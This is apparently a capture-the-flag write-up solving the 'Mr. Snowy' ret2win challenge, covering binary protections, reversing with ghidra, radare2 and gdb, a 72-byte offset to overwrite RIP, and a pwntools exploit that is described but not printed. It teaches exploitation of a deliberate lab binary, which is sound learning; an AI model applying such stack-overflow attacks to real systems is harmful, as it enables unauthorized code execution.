Intro
Mr. Snowy was the binary exploitation/pwn challenge released on day 1, and was a classic stack-based buffer overflow, specifically what many call a “ret2win” challenge. After looking at the initial behavior, we’ll go into some well-known reverse engineering and debugging tools, ghidra, radare2, and gdb, and find a function (our “win” function) that will print the flag. With all of this together, we can use the pwntools
library to make a quick exploit to insert the address of the win function into the RIP, and print out the flag.
Description
There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing. But, this ☃️ snowman... it scares me.. He is always 👀 staring at Santa's house. Something must be wrong with him.
Initial Observations
Enumeration
We’ve done a stack-based buffer overflow on this blog before, but binary exploitation challenges usually require you to dig a bit deeper than just “spike every possible input”, so we’ll do that first.
From our file
command, we learn that the binary is a 64-bit ELF file, which isn’t too crazy. As for the other command, checksec
comes from the pwntools toolkit, a “CTF framework and exploit developement library” that makes exploit development easy. It’ll return some information on the architecture and memory protections on the program. A brief explanation on each:
- RELRO stands for Relocation Read-Only, which is currently out of scope of my knowledge (still haven’t studied binary exploitation that deep), but you can read more here
- Stack Canaries come from the old practice of leaving a canary at the opening of a coal mine. If the canary stopped chirping, that meant there were noxious gasses and the miners needed to leave (dark, I know). Here, they detect stack overflows. If the stack is overflown, the canary basically flips a switch telling the program to shut down before something bad happens.
- NX is short for non-executable. If this is enabled, this means memory segments can either be written to or executed, but not both. Simply put, we can’t put shellcode on the stack and expect it to execute.
- PIE stands for Position Independent Executable. If enabled, dependencies will be loaded into random locations, making it harder to rely on how memory is mapped out.
Coming back to checksec
, we don’t really have to worry about RELRO because this is a beginner challenge, but the NX will mean we probably will not get a shell from our exploit.
Running the Program
The program plays like a “choose your own adventure”, but you lose no matter what you do (says something about society I guess).
If you “Let it be”, you lose. If you “Deactivate”, you don’t know the password, and lose. If you “Break it”, it’s said to be “unbreakable”, and you lose. What gives?
Decompiling, Disassembling, and Reversing
Before continuning, I’ll preface everything here as being a little bit overkill. We’re going to go over ghidra, radare2, and gdb, but you really only need gdb for this challenge because spoiler: it’s just a buffer overflow. But, because it’s good learning, we’ll briefly touch on some tools for learning purposes.
ghidra
ghidra is a tool developed by the NSA which is used for analyzing binaries, mostly known for it’s decompiler, used to try and get the C code back from the assembly code. However, as a warning, ghidra is not perfect. The process of “decompiling” is looking at the assembly code, and guessing what the original code might have been. With this in mind, you’ll have to do some cleaning of your own, especially if a program is longer.
Explaining all of ghidra’s functions is enough for it’s own standalone post, but for now, we’ll make a new, non-shared project, import the mr_snowy
file, and just follow along with the default settings.
Once we have the CodeBrowser open, things can look a little intimidating at first. For the time being, all we have to focus on is the “Functions” folder in the “Symbol Tree”, the assembler code in the middle, and the code display on the right. If we click on main
in the “Functions” folder, ghidra returns this.
We can follow each of these functions by clicking on them. The setup()
function sets up the initial buffer for user input (not important right now), and banner()
is just the snowman we see every time we run the program. If we click on snowman()
, we get this:
You can now see how the decompiling isn’t the cleanest. There’s one more function explicitly in the code, investigate()
.
So far, haven’t found any sign of a flag. However, there’s an additional function that’s noted that doesn’t show up in the primary flow of logic.
When we run the program as-is, we never touch this function, but this is the function that contains the flag. Although I haven’t really explained any of the code, we can tell that there’s probably a buffer overflow (because of the unchecked user input in investigate()
). While we can’t insert shellcode, we could overwrite the instruction pointer to point at this function. We can use ghidra to find the address of the function in memory, but I’d rather highlight some other tools that you could use before we get to writing the exploit.
radare2
Radare2 is a tool for analyzing a variety of things, not just binaries, but is mainly used for its disassembler. While it doesn’t try and recreate C from the assembly code, it tends to not make assumptions, and can give a more accurate look at the flow of logic, if you’re comfortable looking at assembler. Again, there are many, many things that this tool can do, but we’ll keep it simple for now. We can start using radare2 by calling it from the command line like so.
You can run r2 without the -A
flag, but I include it to start the analysis immediately. We can use s main
to “seek to main”, and then run pdf
to disassemble the function.
Note how this looks similar to the ghidra output. We can get a list of the functions used in the program by running afl
.
Note that this more clearly displays where each function is in memory. If we wanted to seek to the sym.deactivate_camera
function, we can run s sym.deactivate_camera
, followed by a pdf
again (or run pdf @ sym.deactivate_camera
). I’ll skip the output for brevity’s sake.
The last command that may be useful is running izz
, which is like running strings
on the binary, but just a little bit smarter. Now that we know what we’re looking at, let’s look at gdb and developing the exploit with pwntools.
Exploit Development
gdb
GDB, or the GNU Debugger, is a debugger for Unix-like operating systems that supports a variety of languages; it’s basically what we’ll use instead of Immunity Debugger or Windbg. For pwn challenges, I also like using an additional plugin known as pwndbg, which simplifies some of syntax and makes it easier to look at. We can start the program with r
, to run it. If we wanted to redirect input into the program, we can do r < INPUT
, like how it normally works in Linux.
I’ll start by trying to spike the program at both inputs, and find that only the second user input is susceptible to overflow.
Since this is a 64-bit program, the size of the registers are larger, and therefore it’s the RIP instead of the EIP, and the RSP instead of the ESP. Additionally, as opposed to the overflow we saw in Brainstorm, if you overflow the RIP with an invalid value, it just won’t change, but it still is overflowed (this troubled me for a little bit). Normally, we would determine the exact offset using a cyclic string, but since we already have the source code, we’ve seen that a buffer of 64 bytes is allocated for user input, meaning it takes 72 bytes to completely overwrite the RIP.
Aside from this, all we really need is the memory address of the deactivate_camera()
function. I’ve already shown two tools you can use to locate this, but pwndbg lets us do this in two different ways. We can run info functions
to get a list of all functions.
Or we can use print& deactivate_camera
for the specific function that we want.
We also could have disassembled any of these functions in pwndbg using disassemble FUNCTION
. I encourage you to read through the documentation and learn more.
pwntools
Now, we can finally get to writing the exploit. The tricky thing here is not actually writing it- all we have to do is send 64 A’s followed by a return address -but getting past all of the cosmetic additions. Luckily, pwntools
simplifies this process with a variety of functions. I’ll show you the code and then explain it afterwards.
This is a stripped down version of the code that CryptoCat used in his walkthrough of Reg on HackTheBox, because it’s a good template to work off of (note that it is in python2 because that’s just what pwn authors like using). To sum things up:
- We set a log level for debugging the exploit
- We tell pwntools what kind of architecture we’re working with in the line where we assign stuff to
elf
- We start the process, and use
flat()
to flatten our arguments into a string. We don’t even have to rewrite our RIP in little-endian, pwntools takes care of that. - We use the
sendlineafter()
to avoid playing withrecv()
s, and just specify at what point we want data to be sent. - And then we get the flag!
Grabbing the Flag
Locally, we get this:
I have a virtual environment for pwntools in python2, hence the “env”The neat thing about pwntools is that we can just change the process()
method for remote()
, specifying the address, while the rest of our syntax can stay the same. Running the exploit against the remote target, we get the flag.
Additional Resources
Binary exploitation goes very, very deep, and I’m excited to begin learning about it when I have time. If you want to learn more, here are some resources:
- Nighmare - Intro to Pwn/Rev
- ir0nstone’s pwn notes
- THM Intro to pwntools
- CryptoCat YouTube
- LiveOverflow YouTube
Apologies if this post was a little more verbose than it really needed to be, but I hope you learned something, or remembered something, or found something I said wrong and are able to correct me :)